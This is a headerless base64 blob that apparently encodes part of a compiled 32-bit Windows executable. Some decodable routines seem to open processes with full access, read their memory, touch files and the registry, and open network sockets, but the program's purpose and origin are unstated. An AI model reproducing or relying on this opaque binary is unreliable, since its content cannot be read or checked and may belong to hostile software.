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
